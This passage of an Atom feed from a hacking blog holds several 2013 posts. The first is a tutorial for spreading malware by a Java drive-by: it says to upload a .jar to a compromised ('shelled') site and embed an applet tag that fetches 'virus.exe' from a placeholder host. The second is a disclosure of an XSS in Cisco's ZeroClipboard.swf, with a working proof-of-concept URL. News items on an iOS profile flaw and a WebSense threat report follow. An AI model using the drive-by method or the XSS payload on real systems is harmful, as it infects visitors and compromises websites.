Now lets get started, Upload you &lt;b&gt;.jar file&lt;/b&gt; on the shelled web, than 
create a fake webpage its up to you how you much you make fake webpage 
attractive, but you have to add the java code due to which the pop up 
error will appear
&lt;br /&gt;
&lt;h4&gt;
Java Code:&amp;nbsp;&lt;/h4&gt;
&lt;i&gt;&amp;lt;APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0"&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe"&amp;gt; &lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
So add the above code in your face webpage, just make some changes replace VALUE = "http://www.yoursite.com/virus.exe" with your virus like the image below:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.foto.pk/images/capturfzf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="57" src="http://www.foto.pk/images/capturfzf.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;So this is it! Simplest and most effective method used by attackers to spread your malicious software.&lt;br /&gt;
&lt;h4&gt;
&amp;nbsp;About the author &lt;/h4&gt;
&lt;div&gt;
This article has been written by fahad awan, He is the newest author on RHA team. We wish him best of luck with his tutorials.&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4CfhBTcypAg:-uwMvWcKGw8:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4CfhBTcypAg:-uwMvWcKGw8:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4CfhBTcypAg:-uwMvWcKGw8:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4CfhBTcypAg:-uwMvWcKGw8:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4CfhBTcypAg:-uwMvWcKGw8:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/4CfhBTcypAg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/6582487803810754179/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/how-attackers-spread-malware-with-java.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/6582487803810754179?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/6582487803810754179?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/4CfhBTcypAg/how-attackers-spread-malware-with-java.html" title="How Attackers Spread Malware With Java Drive by?" /><author><name>FaHaD aWaN</name><uri>http://www.blogger.com/profile/11388036707127075893</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/how-attackers-spread-malware-with-java.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkUDRn84eSp7ImA9WhBQE0s.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4363113269812768596</id><published>2013-03-15T09:17:00.002-07:00</published><updated>2013-03-15T09:17:57.131-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-15T09:17:57.131-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="swf vulnerabilities" /><title>Cisco ZeroClipboard Swf File XSS</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-RPtfA8y3Hps/UUNHKbNyjEI/AAAAAAAACsw/opLq1EZsCuo/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-RPtfA8y3Hps/UUNHKbNyjEI/AAAAAAAACsw/opLq1EZsCuo/s1600/images.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The security of &amp;nbsp;the target website depends upon the number of vectors an attacker knows, The more vectors an attacker knows the more chances he would have for compromising your website. One of the reasons why i have managed to secure my places in most of the&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2009/03/about-me.html" target="_blank"&gt; security hall of fames&lt;/a&gt;&lt;/b&gt;&amp;nbsp;was that i did not tried a single attack vectors, i tested a the target for lots of different attack vectors, one of them was swf. swf files are commonly found on mots of the websites. Though there are lots of other&amp;nbsp;vulnerabilities for swf files, however i would stick to the topic of this post and would leave other's for upcoming posts.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;Recently, i was testing cisco for potential&amp;nbsp;vulnerabilities, initially i took tested for SQLi, XSS, CSRF and other attacks, but was out of luck. Therefore, i decided to test it for swf file&amp;nbsp;vulnerabilities. One of the common swf vulnerabilities i look for inside a website is for&lt;b&gt; "ZeroClipboard Xss"&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What Is ZeroClipboard?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;The ZeroClipboard library provides an easy way to copy text to the clipboard using an invisible Adobe Flash movie, and a JavaScript interface. The "Zero" signifies that the library is invisible and the user interface is left entirely up to you.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;
&lt;br /&gt;
I used google to search, if any of cisco's subdomain or cisco.com itself contain this file, luckily i found the path to bx.cisco.com that contained &lt;b&gt;zeroclipboard.xss&lt;/b&gt;. So i began testing for XSS and bingo it worked.&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;
&lt;b&gt;Cisco Swf POC&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;i&gt;http://bx.cisco.com/cbx-portal/js/zeroclipboard/ZeroClipboard.swf#?id=\"))}catch(e){alert(/XSSbyrafay/.source);}//&amp;amp;width=500&amp;amp;height=500&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-tu1lhy_9qpY/UUNGbNJQ4NI/AAAAAAAACso/4ryuovGuJkA/s1600/CISCO+XSS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="222" src="http://4.bp.blogspot.com/-tu1lhy_9qpY/UUNGbNJQ4NI/AAAAAAAACso/4ryuovGuJkA/s400/CISCO+XSS.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;Vulnerable Code&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;
public function ZeroC&lt;i&gt;lipboard()&lt;/i&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;{
....
var flashvars:Object = LoaderInfo(this.root.loaderInfo).parameters;&lt;/i&gt;&lt;i&gt;&amp;nbsp;id = flashvars.id;
....&amp;nbsp;&lt;/i&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null);&lt;/i&gt;&lt;/blockquote&gt;
As you can look from the above code is that id parameter from Externalinterface.call is passed to the second parameter, without being properly sanitized. Therefore it results into an XSS.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Further&amp;nbsp;Reading&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
If you are really interested in learning about zeroclipboard xss, i would recommend you read the following articles:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;https://github.com/jonrohan/ZeroClipboard/issues/14&lt;/b&gt;&lt;br /&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=SSANM8AWGWQ:ZTboVpmBXeI:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=SSANM8AWGWQ:ZTboVpmBXeI:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=SSANM8AWGWQ:ZTboVpmBXeI:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=SSANM8AWGWQ:ZTboVpmBXeI:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=SSANM8AWGWQ:ZTboVpmBXeI:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/SSANM8AWGWQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4363113269812768596/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/cisco-zeroclipboard-swf-file-xss.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4363113269812768596?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4363113269812768596?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/SSANM8AWGWQ/cisco-zeroclipboard-swf-file-xss.html" title="Cisco ZeroClipboard Swf File XSS" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-RPtfA8y3Hps/UUNHKbNyjEI/AAAAAAAACsw/opLq1EZsCuo/s72-c/images.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/cisco-zeroclipboard-swf-file-xss.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ck8MR348eyp7ImA9WhBQEkQ.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-2674025473766105594</id><published>2013-03-14T12:09:00.000-07:00</published><updated>2013-03-14T12:54:46.073-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-14T12:54:46.073-07:00</app:edited><title>Vulnerability Discovered In iPhone - Poses Serious Threat To Users</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-mdeXi9Z3G_Y/UUIfkDP5MLI/AAAAAAAABCU/c85ZAR761tI/s1600/vulnerability.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-mdeXi9Z3G_Y/UUIfkDP5MLI/AAAAAAAABCU/c85ZAR761tI/s400/vulnerability.jpg" width="375" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
Another vulnerability has been discovered on iPhone that could allow hackers to remotely control it. &lt;b&gt;&lt;a href="http://blog.skycure.com/2013/03/malicious-profiles-sleeping-giant-of.html" rel="nofollow" target="_blank"&gt;Skycure, an Israeli company, states it to be a major flaw in iOS configuration which could post a malware threat.&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
A file known as mobileconf is being attacked due to this vulnerability. This file is used by phones carriers to configure system-level settings including WiFi, VPN, email and APN.&lt;br /&gt;
&lt;br /&gt;
Skycure's CEO, Adi Sharabani, has taken the exploit to a test drive to explain how an iPhone can be controlled while retrieving victim's location and other sensitive information.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-dULx7L5vybk/UUIdoXtITGI/AAAAAAAABCM/Y25KuU6gAfk/s1600/Critical+iOS+vulnerability+in+Configuration+Profiles+pose+malware+threat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="249" src="http://1.bp.blogspot.com/-dULx7L5vybk/UUIdoXtITGI/AAAAAAAABCM/Y25KuU6gAfk/s640/Critical+iOS+vulnerability+in+Configuration+Profiles+pose+malware+threat.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h4 style="text-align: left;"&gt;
Ways to get infected:&lt;/h4&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;ol style="background-color: white; color: #333333; line-height: 19px; list-style-image: initial; list-style-position: initial; margin: 0.5em 0px; outline: none; padding: 0px 0px 0px 2em; text-align: justify;"&gt;
&lt;li style="margin: 0px; outline: none; padding: 0px;"&gt;&lt;span style="white-space: pre-wrap;"&gt;&lt;span style="font-family: inherit;"&gt;Victims browse to an attacker-controlled website, which promises them free access to popular movies and TV-shows. In order to get the free access, “all they have to do” is to install an iOS profile that will “configure” their devices accordingly.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="margin: 0px; outline: none; padding: 0px;"&gt;&lt;span style="font-family: inherit; white-space: pre-wrap;"&gt;Victims receive a mail that promises them a “better battery performance” or just “something cool to watch” upon installation.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px; white-space: pre-wrap;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-x9vp53rzI-k/UUIfqRCgsDI/AAAAAAAABCc/fbwbaf7P9g4/s1600/hack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="295" src="http://2.bp.blogspot.com/-x9vp53rzI-k/UUIfqRCgsDI/AAAAAAAABCc/fbwbaf7P9g4/s400/hack.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h4 style="text-align: left;"&gt;
To avoid this attack one must follow these rules:&lt;/h4&gt;
&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;You should only install profiles from trusted websites or applications.&lt;/li&gt;
&lt;li&gt;Make sure you download profiles via a secure channel (e.g., use profile links that start with https and not http).&lt;/li&gt;
&lt;li&gt;Beware of non-verified mobileconfigs. While a verified profile isn't necessarily a safe one, a non-verified should certainly raise you suspicion.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
Cheers!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;About the Author:&lt;/b&gt;&lt;br /&gt;
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NRtaRx3uAeU:EsRwSGIbIw0:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NRtaRx3uAeU:EsRwSGIbIw0:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NRtaRx3uAeU:EsRwSGIbIw0:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NRtaRx3uAeU:EsRwSGIbIw0:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/NRtaRx3uAeU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/2674025473766105594/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/vulnerability-discovered-in-iphone.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/2674025473766105594?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/2674025473766105594?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/NRtaRx3uAeU/vulnerability-discovered-in-iphone.html" title="Vulnerability Discovered In iPhone - Poses Serious Threat To Users" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-mdeXi9Z3G_Y/UUIfkDP5MLI/AAAAAAAABCU/c85ZAR761tI/s72-c/vulnerability.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/vulnerability-discovered-in-iphone.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0EGR3Y5eip7ImA9WhBQEk0.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-1707009763556054868</id><published>2013-03-13T00:30:00.000-07:00</published><updated>2013-03-13T14:20:26.822-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-13T14:20:26.822-07:00</app:edited><title>600% Increase In Cyber Attacks: WebSense Releases Threat Report 2013</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-qjSyBsEJVko/UT8gQtKU-JI/AAAAAAAABBg/OLtrr_awdVI/s1600/GeoGrowthInfectedSites.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="324" src="http://4.bp.blogspot.com/-qjSyBsEJVko/UT8gQtKU-JI/AAAAAAAABBg/OLtrr_awdVI/s640/GeoGrowthInfectedSites.bmp" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
One thing I love more than writing is online threat reports - all the blood, sweat and tears combined with the satisfaction of discovery and elimination of the threat. Ahh! The moment you come to the realisation that there are smarter people in this world who can shoot you point-blank without ever being caught. Yes, brutality is the name, the name of the game!&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
WebSense has kept up to speed in this game and they have &lt;b&gt;&lt;a href="http://www.websense.com/content/websense-2013-threat-report.aspx" rel="nofollow" target="_blank"&gt;released a report&lt;/a&gt;&lt;/b&gt; to show for it. WebSense has released the 2013 Threat report enumerating an analysis on cyber threats. According to WebSense, cyber threats have increased over the years due to usage of ancient security protocols. Attackers are able to easily bypass these mechanisms and target mobile platforms and social media, the two most celebrated inventions of this century.&lt;br /&gt;
&lt;br /&gt;
Internet has been reported to be the 'attack vector and the primary support element of other attack trajectories'. Malicious websites have grown in number (almost 600%) and 85% of these are being hosted by legitimate but compromised providers.&lt;br /&gt;
&lt;br /&gt;
Genre of sites that were mainly attacked were:&lt;br /&gt;
&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Information Technology&lt;/li&gt;
&lt;li&gt;Business and Economy&lt;/li&gt;
&lt;li&gt;Sex&lt;/li&gt;
&lt;li&gt;Travel&lt;/li&gt;
&lt;li&gt;Shopping&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
Probably because attackers wanted to cover all areas of human psyche and, in general, life? No wonder the number of threats and attacks have increased.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;- Social Media&lt;/b&gt; was one of the most exploited channels due to its large audience. Most of the links consisted of malicious content which were spread through the network. New features and interfaces also resulted in some amount of confusion leading to successful attacks on the user.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;- Mobile Platform&lt;/b&gt; were again easily attacked due to jailbreaking, and download and installation of malicious apps.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote style="line-height: 19px; margin: 2em; padding: 0.1em 1.5em; position: relative; text-align: -webkit-auto;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-wH66v2hpv6w/UT8gP2IH1hI/AAAAAAAABBU/0ujtDra9cxM/s1600/MobileUSe.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="268" src="http://4.bp.blogspot.com/-wH66v2hpv6w/UT8gP2IH1hI/AAAAAAAABBU/0ujtDra9cxM/s640/MobileUSe.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 1em; margin-top: 1em; padding: 0px;"&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-family: inherit;"&gt;Legitimate apps were also a cause for concern; many proved less secure than expected. Consider a study by Philipps University and Leibniz University in Germany involving 13,500 free apps downloaded from Google Play. Researchers found that 8 percent of these apps were vulnerable to&amp;nbsp;man-in-the-middle&amp;nbsp;attacks, and approximately 40 percent enabled the researchers to capture credentials for American Express, Diners Club, Paypal, bank accounts, Facebook,Twitter, Google, Yahoo, Microsoft Live ID, Box, WordPress, remote control servers, arbitrary email accounts, and IBM Sametime, among others.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="font-size: 13px; line-height: 19px; margin-bottom: 1em; margin-top: 1em; padding: 0px; text-align: -webkit-auto;"&gt;
&lt;span style="background-color: white; font-size: small; line-height: normal; text-align: left;"&gt;&lt;span style="font-family: inherit;"&gt;WebSense stated that malicious apps mainly require three permissions:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 19px; margin-bottom: 1em; margin-top: 1em; padding: 0px; text-align: -webkit-auto;"&gt;
&lt;/div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="background-color: white; line-height: normal; text-align: left;"&gt;&lt;span style="font-family: inherit;"&gt;82% of malicious apps send, receive, read or write SMS message.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="text-align: left;"&gt;&lt;span style="font-family: inherit;"&gt;12.5% malicious apps require RECEIVE_WAP_PUSH permission.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="text-align: left;"&gt;&lt;span style="font-family: inherit;"&gt;10% malicious apps asked for permission to install other apps.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;- Email&lt;/b&gt; was another vector that took to WebSense's notice as only 20% of the emails sent and received were legitimate. 80% were phishing and spam emails. It is very easy to fall pry to such attacks because the links present in these emails seem to be from "real people" but basically consist of links to compromised websites or the attachments present in them are infected.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-ovqe81nj7nY/UT8gPRymLVI/AAAAAAAABBQ/zzYBIII-L0Y/s1600/EmailTheats.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="316" src="http://2.bp.blogspot.com/-ovqe81nj7nY/UT8gPRymLVI/AAAAAAAABBQ/zzYBIII-L0Y/s640/EmailTheats.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
Report also introduced "time-delay" attack, "in which embedded web links are kept benign until after traditional email security defences are bypassed".&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
According to WebSense the following categories of malicious web links are present in Spam Email:&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;ul style="text-align: left;"&gt;
